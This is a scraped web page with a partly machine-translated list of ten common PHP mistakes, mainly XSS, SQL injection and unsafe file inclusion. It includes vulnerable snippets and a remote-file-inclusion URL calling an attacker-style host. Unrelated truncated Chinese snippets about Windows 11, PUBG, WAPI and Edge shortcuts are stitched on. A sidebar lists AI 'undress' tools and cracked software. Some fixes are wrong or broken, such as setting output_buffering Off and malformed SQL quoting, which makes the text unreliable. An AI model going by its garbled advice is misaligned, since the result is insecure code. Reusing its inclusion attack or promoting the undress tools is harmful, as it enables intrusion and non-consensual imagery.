


PHPProgrammers are now taking on more and more important tasks. php is a great web development language, a flexible language, but I have seen some mistakes that PHP programmers make over and over again. I made the following list of 10 common mistakes made by PHP programmers, most of which are related to security. See what kind of mistakes you made:
1. Do not ignore html entities
A basic common sense: all untrusted input (especially user Data submitted from the form) must be changed before output.
<ol class="dp-c"><li class="alt"><span><span class="func">echo</span><span> </span><span class="vars">$_GET</span><span>[</span><span class="string">'usename'</span><span>] ; </span></span></li></ol>
This example may output:
<script>/*Script to change admin password or set cookie*/</script>
This is an obvious security risk unless you ensure that your users are typing correctly.
How to fix:
We need to convert "","and", etc. into the correct HTML representation (', and "), The functions htmlspecialchars and htmlentities() do exactly this.
Correct method:
<ol class="dp-c"><li class="alt"><span><span class="func">echo</span><span> htmlspecialchars(</span><span class="vars">$_GET</span><span>[</span><span class="string">'username'</span><span>], ENT_QUOTES); </span></span></li></ol>
2. Do not ignore SQL input
I once discussed this issue in an article The Simplest Way to Prevent SQL Injection (php+MySQL) and gave a simple method. Someone said to me that they already have it in php.ini. Set magic_quotes to On so don't worry about this, but not all input is coming from $_GET, $_POST or $_COOKIE!
How to fix:
and in As the simplest method to prevent sql injection (in php+mysql), I still recommend using the mysql_real_escape_string() function
Correct approach:
<ol class="dp-c"> <li class="alt"><span><span><?php </span></span></span></li> <li> <span class="vars">$sql</span><span> = “UPDATE users SET </span> </li> <li class="alt"> <span>name=’.mysql_real_escape_string(</span><span class="vars">$name</span><span>).’ </span> </li> <li> <span>WHERE id=’.mysql_real_escape_string (</span><span class="vars">$id</span><span>).’”; </span> </li> <li class="alt"> <span>mysql_query(</span><span class="vars">$sql</span><span>); </span> </li> <li><span>?> </span></li> </ol>
3. Wrong use HTTP-header related functions: header(), session_start(), setcookie()
Have you encountered this warning?" warning: Cannot addheader information - headers already sent [.. ..]
Every time a web page is downloaded from the server, the server's output is divided into two parts: the header and the body.
The header contains some non-visual data, such as cookies. The head always arrives first. The text part includes visual html, pictures and other data.
If output_buffering is set to Off, all HTTP-header related functions must be called before there is output. The problem is that when you develop in one environment and deploy to another environment, the output_buffering settings may be different. As a result, the redirection stopped and the cookie and session were not set correctly.
How to fix:
Make sure to call http-header related functions before outputting, and set output_buffering = Off.
4. Require or include files use unsafe data
Again: don’t trust data that is not explicitly declared by yourself. Do not include or require files obtained from $_GET, $_POST or $_COOKIE.
For example:
<ol class="dp-c"> <li class="alt"><span><span>index.php </span></span></li> <li><span> </span></li> <li class="alt"> <span class="comment">//including header, config, database connection, etc </span><span> </span> </li> <li> <span class="keyword">include</span><span>(</span><span class="vars">$_GET</span><span>[</span><span class="string">'filename'</span><span>]); </span> </li> <li class="alt"> <span class="comment">//including footer </span><span> </span> </li> <li><span>?> </span></li> </ol>
Now any hacker can now use: http://www.yourdomain.com/index.php?filename=anyfile.txt to obtain your secrets information, or execute a PHP script.
If allow_url_fopen=On, you are dead:
Try this input:
http://www.yourdomain.com/index. … n. com%2Fphphack.php
Now your web page contains the output of http://www.youaredoomed.com/phphack.php. Hackers can send spam, change passwords, delete files, etc. Anything you can imagine.
How to fix:
You must control which files can be included in the include or require directives yourself.
Here is a quick but not comprehensive solution:
<ol class="dp-c"> <li class="alt"><span><span> </span></span></li> <li> <span class="comment">//Include only files that are allowed. </span><span> </span> </li> <li class="alt"> <span class="vars">$allowedFiles</span><span> = </span><span class="keyword">array</span><span>(’file1.txt’,</span><span class="string">'file2.txt’,'</span><span>file3.txt’); </span> </li> <li> <span class="keyword">if</span><span>(in_array((string)</span><span class="vars">$_GET</span><span>[</span><span class="string">'filename'</span><span>],</span><span class="vars">$allowedFiles</span><span>)) { </span> </li> <li class="alt"> <span class="keyword">include</span><span>(</span><span class="vars">$_GET</span><span>[</span><span class="string">'filename'</span><span>]); </span> </li> <li><span>} </span></li> <li class="alt"> <span class="keyword">else</span><span>{ </span> </li> <li> <span class="func">exit</span><span>(’not allowed’); </span> </li> <li class="alt"><span>} </span></li> <li><span>?> </span></li> </ol>
5. Syntax Errors
Grammar errors include all Lexical and grammatical errors are so common that I have to list them here. The solution is to study the syntax of PHP carefully and be careful not to miss a bracket, brace, semicolon, or quotation mark. Also, find a good editor and don’t use Notepad!
6. Rarely or never use object-oriented technology
Many projects do not use PHP’s object-oriented technology, and as a result, code maintenance becomes very difficult. It takes time and effort. PHP supports more and more object-oriented technologies and is getting better and better. There is no reason why we should not use object-oriented technologies.
7. Not using framework
95% of PHP projects are doing the same four things: Create, edit, list and delete. Now there are Many MVC frameworks help us accomplish these four things, why don't we use them?
8. Don’t know the functions that are already in PHP
The core of PHP contains many functions. Many programmers reinvent the wheel over and over again. A lot of time wasted. Before coding, search for PHP mamual and search on google. You may find new discoveries! exec() in PHP is a powerful function that can execute cmd shell and return the last line of the execution result in the form of a string. For security reasons, you can use EscapeShellCmd()
9. Use older versions of PHP
很多程序员还在使用PHP4,在PHP4上开发不能充分发挥PHP的潜能,还存在一些安全的隐患。转到PHP5上来吧,并不费很多功夫。大部分PHP4程序只要改动很少的语句甚至无需改动就可以迁移到PHP5上来。根据http://www.nexen.net的调查
只有12%的PHP服务器使用PHP5,所以有88%的PHP开发者还在使用PHP4.
10.对引号做两次转意
见过网页中出现’或’”吗?这通常是因为在开发者的环境中magic_quotes设置为off,而在部署的服务器上magic_quotes=on. PHP会在 GET, POST 和COOKIE中的数据上重复运行addslashes() 。
原始文本:
<ol class="dp-xml"> <li class="alt"><span><span>It’s a string </span></span></li> <li><span>magic quotes on: </span></li> <li class="alt"><span>It’s a string </span></li> <li><span>又运行一次 </span></li> <li class="alt"><span>addslashes(): </span></li> <li><span>It\’s a string </span></li> <li class="alt"><span>HTML输出: </span></li> <li><span>It’s a string </span></li> </ol>
还有一种情况就是,用户一开始输入了错误的登录信息,服务器检测到错误输入后,输出同样的form要求用户再次输入,导致用户的输入转意两次!
希望通过以上内容介绍的十方面,能够给你打击来帮助。

wapi这个名词用户们可能在使用网络得时候见到过,但是对于一部分人来说肯定都不知道wapi是什么,下面就带来了详细介绍,帮助不知道小伙伴去了解。wapi是什么东西:答:wapi是无线局域网鉴别和保密的基础结构。这就像红外线和蓝牙等功能一样,一般都覆盖在办公楼等地方的附近。基本都是为一个小部门所有的,所以这个功能涉及的范围只有几公里。wapi相关介绍:1、wapi是无线局域网里面的一种传输协议。2、这款技术是可以去避免窄频带通信的问题,可以更好的去进行传播。3、仅仅只需要一个代码就可以去传送信号了

pubg又称绝地求生,是一款非常经典的射击大逃杀类型游戏,从2016年火爆以来一直拥有非常多的玩家。在最近的win11系统推出后,就有不少玩家想要在win11上游玩它,下面就跟着小编来看看win11是否可以玩pubg吧。win11能玩pubg吗:答:win11可以玩pubg。1、在win11推出之初,因为win11需要开启tpm的缘故,所以导致很多玩家被pubg封号处理了。2、不过后来根据玩家的反馈,蓝洞方面已经解决了这个问题,目前已经可以在win11中正常玩pubg了。3、如果大家遇到了pub

Python函数介绍:exec函数的介绍及示例引言:在Python中,exec是一种内置函数,它用于执行存储在字符串或文件中的Python代码。exec函数提供了一种动态执行代码的方式,使得程序可以在运行时根据需要生成、修改和执行代码。本文将介绍exec函数的使用方法,并给出一些实际的代码示例。exec函数的使用方法:exec函数的基本语法如下所示:exec

i5是英特尔旗下的一系列处理器,拥有到现在11代i5的各种不同版本,每一代都有着不同性能。因此对于i5处理器是否能够安装win11,还需要看是第几代的处理器,下面就跟着小编一起来分别了解一下吧。i5处理器能装win11吗:答:i5处理器能装win11。一、第八代及之后的i51、第八代及后续的i5处理器是能够满足微软的最低配置需求的。2、因此我们只需要进入微软网站,下载一个“win11安装助手”3、下载完成后,运行该安装助手,根据提示进行操作就可以安装win11了。二、第八代之前的i51、第八代之

在如今快捷的生活,为了提高工作效率,快捷键是必不可少的工作需求。快捷键是指按键或按键组合,可提供另一种方式来执行通常使用鼠标执行的操作。那么edge快捷键有哪些呢?edge快捷键的功能又有哪些呢?下面小编整理了一份edge快捷键的介绍,感兴趣的朋友们快来看看吧!Ctrl+D:将当前页面添加到收藏夹或阅读列表Ctrl+E:在地址栏中执行搜索查询Ctrl+F:在页面上查找Ctrl+H:打开历史记录面板Ctrl+G:打开阅读列表面板Ctrl+I:打开收藏夹列表面板(测试好像不起作用)Ctrl+J:打开

很多用户在电脑上安装了打印机驱动程序,但却不知道如何找到它们。因此,今天我为大家带来了详细介绍打印机驱动程序在电脑中的位置,对于还不了解的用户,快来看看吧打印机驱动在电脑哪里找重新撰写内容而不改变原义时,需要将语言改写为中文,不需要出现原句首先,建议使用第三方软件进行搜索2、在右上角找到"工具箱"3、在下方找到并点击“设备管理器”。改写后的句子:3、在底部找到并点击“设备管理器”4、然后打开“打印队列”,然后找到你的打印机设备。此次是你的打印机名称型号。5、右键打印机设备,就能够去更新或者卸载我

在微软公司发布了win10系统之后,我们所知的就有好几种版本:家庭版、教育版、专业版、旗舰版等等。小编认为这些版本在性能上没什么差别,只是有些针对性的功能不同。那么小编今天就来跟大家聊一聊玩游戏用win10哪个版本最好吧~希望可以帮助到你。玩游戏用win10哪个版本最好答:玩游戏来说,这几个版本其实区别并不大。如果只是想要拿来打游戏的话,推荐win10家庭版。因为家庭版没有其他花里胡哨的功能,能够让性能主要集中在游戏方面。这个问题,首先要说的就是win10几个版本之间的区别。1、win10主要版

Java语言是一种高级编程语言,非常适合用于数学模型的构建和分析。数学模型是数学概念在现实世界中的应用,它们通常用于解决实际问题,例如预测未来趋势、优化生产和制造等。本文将介绍Java语言中常见的数学模型及其应用。线性规划线性规划是一种优化方法,在解决企业最优决策、资源配置以及生产计划等问题中广泛应用。在Java语言中,可以使用ApacheCommons


Hot AI Tools

Undresser.AI Undress
AI-powered app for creating realistic nude photos

AI Clothes Remover
Online AI tool for removing clothes from photos.

Undress AI Tool
Undress images for free

Clothoff.io
AI clothes remover

AI Hentai Generator
Generate AI Hentai for free.

Hot Article

Hot Tools

EditPlus Chinese cracked version
Small size, syntax highlighting, does not support code prompt function

Dreamweaver Mac version
Visual web development tools

ZendStudio 13.5.1 Mac
Powerful PHP integrated development environment

SublimeText3 Mac version
God-level code editing software (SublimeText3)

mPDF
mPDF is a PHP library that can generate PDF files from UTF-8 encoded HTML. The original author, Ian Back, wrote mPDF to output PDF files "on the fly" from his website and handle different languages. It is slower than original scripts like HTML2FPDF and produces larger files when using Unicode fonts, but supports CSS styles etc. and has a lot of enhancements. Supports almost all languages, including RTL (Arabic and Hebrew) and CJK (Chinese, Japanese and Korean). Supports nested block-level elements (such as P, DIV),
